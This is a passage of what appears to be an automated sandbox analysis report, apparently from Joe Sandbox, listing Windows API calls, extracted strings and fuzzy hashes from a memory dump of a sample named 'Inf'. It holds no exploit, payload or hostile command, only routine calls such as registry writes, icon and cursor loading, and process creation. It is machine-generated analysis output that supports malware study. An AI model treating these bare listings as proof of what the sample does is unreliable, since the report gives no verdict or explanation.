                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A714FD,?), ref: 00A71B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9CF1D
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AADCD0,00000000,?,00000000,?,?), ref: 00A9CFA4
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A9D004
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9D054
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9D0CF
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A9D112
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A9D221
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A9D2AD
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A9D2E1
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9D2EE
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A9D3C0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00AA1462
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA149D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AA14F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA1526
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA15A2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA161D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FD52: _wcslen.LIBCMT ref: 00A2FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A73535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A73547
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-909552448
APIs
• _wcslen.LIBCMT ref: 00AA8DB5
• _wcslen.LIBCMT ref: 00AA8DC9
• _wcslen.LIBCMT ref: 00AA8DEC
• _wcslen.LIBCMT ref: 00AA8E0F
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AA8E4D
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AA6691), ref: 00AA8EA9
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AA8EE2
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AA8F25
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AA8F5C
• FreeLibrary.KERNEL32(?), ref: 00AA8F68
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AA8F78
• DestroyIcon.USER32(?,?,?,?,?,00AA6691), ref: 00AA8F87
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AA8FA4
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AA8FB0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 799131459-1154884017
APIs
• CharLowerBuffW.USER32(?,?), ref: 00A8493D
• _wcslen.LIBCMT ref: 00A84948
• _wcslen.LIBCMT ref: 00A8499F
• _wcslen.LIBCMT ref: 00A849DD
• GetDriveTypeW.KERNEL32(?), ref: 00A84A1B
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A84A63
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A84A9E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A84ACC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: SendString_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00A76395
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A763A7
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00A763BE
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00A763D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00A763D9
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00A763E9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00A763EF
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A76410
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A7642A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A76433
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7649A
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00A764D6
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A764DC
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00A764E3
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A7653A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A76547
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A7656C
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A76596
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: bff810579c81bbd63eacf5fb38deaaaae6b9af881322949ba1c0b4aab4ebd9d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 46a2b43f53032c92d21afe242673031be1708f228013efef2fa542624b29c4ab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bff810579c81bbd63eacf5fb38deaaaae6b9af881322949ba1c0b4aab4ebd9d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74718F31900B06EFDB20DFA8CE45BAEBBF5FF48704F108918E58AA65A0D775E945CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00A90884
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00A9088F
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00A9089A
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00A908A5
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00A908B0
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00A908BB
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00A908C6
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00A908D1
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00A908DC
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00A908E7
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00A908F2
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00A908FD
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00A90908
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00A90913
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00A9091E
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00A90929
                                                                                                                                                                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 00A90939
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A9097B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 25ad01831072b66491b9fe0b9c8a7c477fe22cc6d22b8c6f13acd6999ff4fd4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: cbde8dbbe88334a917449890c5a111a9b0865808ae6fc2bb0e4829ba65ce3d3d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25ad01831072b66491b9fe0b9c8a7c477fe22cc6d22b8c6f13acd6999ff4fd4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5415370E083196EDB10DFBA8C85C5EBFE8BF04754B50452AA159E7281DB789801CF91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A30436
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00AE170C,00000FA0,F0A49CFC,?,?,?,?,00A52733,000000FF), ref: 00A3048C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A52733,000000FF), ref: 00A30497
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A52733,000000FF), ref: 00A304A8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A304BE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A304CC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A304DA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A30505
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A30510
                                                                                                                                                                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00A30457
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A30413: __onexit.LIBCMT ref: 00A30419
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00A304D2
                                                                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00A304C4
                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable, xrefs: 00A304B8
                                                                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 00A304A3
                                                                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A30492
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                    • Opcode ID: a4b2fb4ebe33e7686b3ff44f17a029de7d448f75cb530feb14b13aa27f73ed55
                                                                                                                                                                                                                                                                                                    • Instruction ID: 798c5c4e552480f5ceff27f360a700d0f8b94119f770b838176105e326565edc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4b2fb4ebe33e7686b3ff44f17a029de7d448f75cb530feb14b13aa27f73ed55
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4212B32A807157FD720ABE4AC56FAA7798FF05F61F004625F906D76D0DB749C028E51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                    • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                                    • Opcode ID: f606d13710aecaddfc27215597e6049007bf33155c07eeab5195c675669d1017
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1211b7a604a1bcc8e2be96e971e9a2421ea0fb782c900802d9ae9896745d0bb7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f606d13710aecaddfc27215597e6049007bf33155c07eeab5195c675669d1017
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E1F533A00516AFCF189F74CD416EDBBB5BF54750F16C12AE45AE7240DB30AE89A790
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00AADCD0), ref: 00A84F6C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A84F80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A84FDE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A85039
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A85084
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A850EC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FD52: _wcslen.LIBCMT ref: 00A2FD5D
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00AD7C10,00000061), ref: 00A85188
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                    • Opcode ID: f6edc20c0fad7aa611f1fb2fc4b1dd1a2a6954ab8a0b2280baf313e5281f3799
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c660e84a19c5214334ee4ede980d2bb8ab4b3d0dd56b11841843d2ece055099
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6edc20c0fad7aa611f1fb2fc4b1dd1a2a6954ab8a0b2280baf313e5281f3799
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FB1A231A087029FC714FF38C990AAAB7F5BF95764F50491DF99687291EB30D884CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BBF8
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC10
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC34
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BC60
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC74
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC96
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BD92
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A80F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A80F6D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BDAB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BDC6
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A9BE16
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00A9BE67
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A9BE99
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9BEAA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9BEBC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9BECE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A9BF43
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 59d4190979491860d0d13cdf54e636abe57daf869b00d56645b83883bfd9c4b7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 917701dd7f6bd51c8458a7a124a3dec2ca3434ff01ebddd07ab809b04a118b25
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59d4190979491860d0d13cdf54e636abe57daf869b00d56645b83883bfd9c4b7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F1A0316143009FCB14EF24DA91B6ABBE5FF85314F14895DF8968B2A2CB71EC45CB62
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00AADCD0), ref: 00A94B18
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A94B2A
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00AADCD0), ref: 00A94B4F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00AADCD0), ref: 00A94B9B
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00AADCD0), ref: 00A94C05
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00A94CBF
                                                                                                                                                                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A94D25
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A94D4F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e186385567c2cee6bb3a90bcb1213248261f8028920b34c52dc7b363c467990
                                                                                                                                                                                                                                                                                                    • Instruction ID: 76052f0945fe12e7dcc2e60d8c9e09876bc35028f2648b9b8c36f8d6c3e720f8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e186385567c2cee6bb3a90bcb1213248261f8028920b34c52dc7b363c467990
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A121A75A00115EFDF14DF94C888EAABBF5FF49714F148098E90AAB251DB31ED46CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00AE29C0), ref: 00A53F72
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00AE29C0), ref: 00A54022
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A54066
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00A5406F
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00AE29C0,00000000,?,00000000,00000000,00000000), ref: 00A54082
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A5408E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
